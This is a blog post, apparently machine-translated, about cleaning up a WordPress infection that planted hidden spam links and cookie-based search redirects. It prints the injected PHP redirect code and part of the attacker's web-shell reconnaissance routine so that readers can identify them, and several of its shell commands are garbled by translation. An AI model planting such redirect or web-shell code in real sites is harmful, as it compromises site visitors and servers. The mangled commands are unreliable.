Virus blogosphere… but what did you have with me ?!

Last month, we all received warnings virus in blog from some visitors. Initially I ignored the warnings, because I had pretty good antivirus installed (Kaspersky AV 2009) And even blog for a long time, I never received a virus alert (a long time ago .. I saw something suspect that the first refresh disappeared. Finally ...).
Slowly started to show great variations Visitor trafficAfter which lately has fallen steadily and traffic began to be more and more people who tell me that stealthsettings.com this virused. Yesterday I received from someone a screenshot made when the antivirus blocked a script on stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. It was convincing enough for me that I'll have searched all sources. The first idea that came to my mind was to do upgrade the latest WordPress (2.5.1), but not before deleting all files in the old script WordPress and to make backup database. This procedure didn't work and it probably took me a long time to figure out where the bug was, if it hadn't told me. Eugen in a discussion over coffee, he found link Google and it would be good to see him.
MyDigitalLife.info, published an article entitled: “WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites"That is the end of the thread I needed.
It's about a exploit de WordPress based on cookiesWhich I think is very complex and made the book. Clever enough to make a SQL Injection Database blog, to create an invisible user a simple routine check in Dashboard->Users, check the server folders and files "writable" (that chmod 777), to search and to execute Group files with the privileges or root. I do not know what is the name EXPLOITAT and see that there are few articles written about him, despite the fact that many blogs are infected, including Romania. Ok ... I will try to try to explain generalities about this virus.

What is the virus?

First, insert the source pages on blogs, links invisible to visitors but visible and indexable for search engines, especially Google. In this way transfer Page Rank sites indicated by the attacker. Second, another is inserted Code Blocks URL for visitors coming from Google, Live, Yahoo, ... or a RSS reader and not the site in cookie. A antivirus detects this redirect that Trojan-Clicker.HTML.

symptoms:

The massive decrease in visitor trafficEspecially blogs, where most visitors come from Google.

Identification: (this is where the problem gets complicated for those who don't know much about phpmyadmin, php and linux)

LA. CAREFUL!!! First make a backup of DATABASE !!!

1. Check source files index.php, header.php, footer.php, The theme of the blog and see if there is a code that uses encryption base64 or contains “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”in the form:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Or something. Delete this code!

Click on the picture ...

code index

In the screenshot above I accidentally selected and " ". That code must remain.

2. Use phpMyAdmin and go to the database table wp_usersWhere check if there is no user name created on 00:00:00 0000-00-00 (Possible in field user_login to write "WordPress”. Write down this user's ID (ID field) and then delete it.

Click on the picture ...

fake user

* The green line, it has removed and detained ID's. In the case of sleepyWas ID = 8 .

3. Go to the Table wp_usermetaWhere you have to find and to wipe the lines for ID (where the field user_id ID value appears deleted).

4. table wp_option, Go active_plugins and see what plugin is enabled suspect. It can be used like endings _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinations of rich image extensions with _old and _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Delete this plugin, then go to the blog -> Dashboard -> Plugins, where you deactivate and activate any plugin.

Click on the image to see how the virus in the file appears active_plugins.

Plugin

Follow the path on the FTP or SSH, indicated in active_plugins and delete the file from the server.

5. Also in phpMyAdmin, in Table wp_option, Find and delete the line containing "rss_f541b3abd05e7962fcab37737f40fad8"And among"internal_links_cache ".
In internal_links_cache, offered encrypted spam links that appear in a blog code of Google Adsnape, The hacker.

6. Is recommended to change password Blog and login remove all suspicious userele. Upgrade to the latest version of WordPress and set the blog to no longer allow new users to register. There is no loss… can also comment uninhabited.

I tried above to explain a bit, what to do in such a situation, to clean the blog of this virus. The problem is much more serious than it seems and not nearly solved, because they are used security vulnerabilities hosting the web server, which is blog.

As a first measure of security, with access SSH, To do some checking on the server to see if there are files like * and * _new _old *. * With endings.giff, .jpeg, .pngg, .jpgg. These files should be deleted. If we rename a file, for example. top_right_old.giff in top_right_old.phpWe see that the file is exactly the exploit code server.

Some useful instructions for checking, cleaning and securing the server. (via SSH)

1.  cd / tmp and check for folders like tmpVFlma or other combinations of names alike and delete it. See the screenshot below, two of these folders to me:

tmpserver

-rf rm foldername

2. Check and eliminate (change chmod-ul) as possible the folders with attributes chmod 777

find all writable files in current dir: find. -type f -ls -Allows -2
find all writable directories in current dir: find. -type d -Allows -2 -ls
find all writable directories and files in current dir: find. -Allows -2 -ls

3. Looking for suspicious files on the server.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, CAREFUL!!! the files that bit set SUID si SGID. These files execute with the privileges of the user (group) or root, not those of the user executing the file. These files can compromise the root, if security issues. If you do not use SUID and SGID bits files, perform "chmod 0 " on them or uninstall package containing them.

The exploit code contains somewhere in the source ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Finds that way ... basically security breaches. Ports open directory "writable" and group execution privileges files / root.

Back with more ...

Some blogs infected: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... The list goes on ... a lot.

You can check if a blog is infected using the Google search engine. copy & paste:

Site: www.blegoo.com buy

Good night and good work;) Soon I think Eugen will come with news, on prevezibil.imprevizibil.com.

brb :)

ATTENTION! Changing the theme of WordPress or upgrade to WordPress 2.5.1, is NOT a solution to get rid of this virus.

Passionate about technology, I enjoy writing on StealthSettings.com since 2006. I have a rich experience in operating systems: macOS, Windows, and Linux, as well as in programming languages and blogging platforms (WordPress) and for online stores (WooCommerce, Magento, PrestaShop).

How to » Noteworthy » Virus blogosphere… but what did you have with me ?!
Leave a Comment